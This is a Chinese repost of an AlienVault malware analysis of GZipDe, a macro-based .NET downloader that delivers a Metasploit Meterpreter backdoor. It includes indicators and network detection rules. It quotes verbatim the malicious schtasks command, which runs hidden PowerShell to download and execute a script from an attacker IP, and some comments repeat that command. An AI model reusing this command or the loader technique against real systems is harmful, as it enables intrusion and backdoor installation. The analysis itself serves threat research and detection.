GZipDe:为Metasploit服务的加密下载程序

GZipDe:为Metasploit服务的加密下载程序

qq黑客访客2021-10-11 18:06:003982A+A-

5月底,一家中东新闻网站发表了一篇关于下一届上海合作组织峰会的文章。一周前,AlienVault实验室发现了一份新的针对该地区的恶意文件。它使用从报告中提取的一段文本作为诱饵:

这是涉及多个服务器和工件的多阶段感染的第一步。虽然最终目标似乎是安装Metasploit后门程序,但是我们发现了一个有趣的.NET下载程序,它使用自定义加密方法来混淆进程内存并逃避防病毒检测。

恶意文件

该文件是由阿富汗用户上传到VirusTotal的,包含嵌入宏恶意软件的微软MS Office Word文档(.doc)。当打开时,它执行一个存储为十六进制流的Visual Basic脚本,并在一个隐藏的Powershell控制台中执行一个新任务:

‘C:WindowsSystem32schtasks.exe’ /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR ‘Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\’http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\’,\’$env:publicsvchost325.vbs\’);(New-Object -com Shell.Application).ShellExecute(\’$env:publicsvchost325.vbs\’);’ /F

利用HTTP请求,它解析为以下URL:

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

由于服务器现在处于离线状态,因此我们缺少了感染链的下一步。

基于共同的路径,我们认为这个文件是相关的,并且可能是后面感染步骤的一部分:http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe。

GZipDe – 加密的下载程序

该恶意软件的内部名称是Gzipde,正如它在攻击者设备上构建的路径所指定的那样:

Documents Visual Studio 2008 Projects gzipde gzipde obj Debug gzipde.pdb

我们在GitHub上发现了原始的反向TCP有效载荷,尽管攻击者在该版本上增加了一层额外的加密有效载荷。它由名为GZipDe的Base64字符串组成,GZipDe是一个压缩后使用对称密钥算法进行自定义加密的字符串,可能会避免防病毒检测。

该密钥被描述为一个字节数组,其值为:

解压后,它通过一个解密程序。使用的加密方法是RC4,密钥长度为23个字节。

恶意软件分配一个新的内存页,具有执行、读和写权限。然后它复制解密的有效载荷的内容,并启动一个新的线程来执行它。

该脚本使用WaitForSingleObject C#类,这意味着程序访问互斥对象。一个特殊的处理程序控制进程对系统资源的访问。这可以防止同一恶意软件的多个实例同时运行,不必要地增加资源使用率并产生更多的网络噪音。

有效载荷包含shellcode,该代码在175.194.42[.]8上与服务器联系 。当服务器没有启动时,Shodan 记录了它服务于Metasploit的有效载荷:

Metasploit正成为有针对性攻击的热门选择。

Metasploit有效载荷

服务器,175.194.42[.]8,交付了一个Metasploit的有效载荷。它包含绕过系统检测的shellcode(因为它看起来有一个有效的DOS标头)和一个Meterpreter有效载荷)——一个有能力的后门。例如,它可以从系统中收集信息,并联系命令和控制服务器以接收进一步的命令。

这个shellcode将整个DLL加载到内存中,所以它可以在没有信息写入磁盘的情况下运行。这个操作被称为反射DLL注入(Reflective DLL injection)。从这一点来看,攻击者可以传输任何其他有效载荷,以获得提升的权限并在本地网络内移动。

附录

文件哈希值

https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28
https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c
https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711

IP地址

118.193.251[.]137

175.194.42[.]8

URLs

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

网络检测

多用途

AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
ET ATTACK_RESPONSE Metasploit/Meterpreter – Sending metsrv.dll to Compromised Host
ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate

专用

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”AV TROJAN GZipDe MacroMalware CnC Checkin”; flow:established,to_server; content:”/dropbox/?p=”; http_uri; depth:12; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; pcre:”^//dropbox/?p=[a-zA-Z0-9]*$/U”; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”AV TROJAN GZipDe MacroMalware Payload Request”; flow:established,to_server; content:”/dropbox/file”; depth:13; http_uri; content:”.exe”; http_uri; distance:0; isdataat:!1,relative; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

统一安全管理(USM)关联规则

系统妥协 – 代码执行 – 由Office Word创建的Powershell进程

交付和攻击 – 可疑下载 – 通过Office宏下载文件

环境意识 – 代码执行 – 可疑的PowerShell参数

原文:https://www.alienvault.com/blogs/labs-research/gzipde-an-encrypted-downloader-serving-metasploit?utm_medium=Social&utm_source=THN&utm_content=SP&utm_campaign=GZipDE_blog
点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 瑰颈浊厌2022-06-05 02:27:04
  • t:”/dropbox/?p=”; http_uri; depth:12; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; pcre:
  • 南殷云胡2022-06-05 02:26:32
  • C:WindowsSystem32schtasks.exe’ /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR ‘Powershell -W Hidden (New

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理